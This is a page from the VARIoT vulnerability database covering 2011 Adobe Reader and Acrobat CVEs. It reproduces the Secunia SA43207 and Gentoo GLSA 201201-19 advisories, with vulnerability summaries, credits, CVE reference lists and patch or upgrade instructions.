VARIoT IoT vulnerabilities database
| VAR-201102-0032 | CVE-2011-0586 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
| CVSS V2: 9.3 | CVSS V3: - | Severity: HIGH |
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors. Adobe Acrobat and Reader are prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
1) An unspecified error related to library loading can be exploited
to execute arbitrary code.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
8) An unspecified error related to library loading can be exploited
to execute arbitrary code.
9) An unspecified error may allow code execution.
10) An input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
12) An unspecified error related to library loading can be exploited
to execute arbitrary code.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors of 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1  app-text/acroread                 < 9.4.7                  >= 9.4.7
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0033 | CVE-2011-0587 | Adobe Reader and Acrobat Vulnerable to cross-site scripting |
| CVSS V2: 4.3 | CVSS V3: - | Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. A cross-site scripting vulnerability exists in Adobe Reader and Acrobat; it is a different vulnerability from CVE-2011-0604. Arbitrary web script or HTML may be inserted by any third party.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Remote attackers can inject arbitrary web script or HTML via unknown vectors.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
| VAR-201102-0031 | CVE-2011-0585 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
| CVSS V2: 9.3 | CVSS V3: - | Severity: HIGH |
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565. This is a different vulnerability from CVE-2011-0565. An attacker could cause a denial of service (DoS) or execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to crash. Arbitrary code execution may be possible; this has not been confirmed.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in an RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing the bits-per-pixel and
number-of-colors values of 4/8-bit RLE compressed BMP files can be
exploited to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
----------------------------------------------------------------------
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0022 | CVE-2011-0566 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
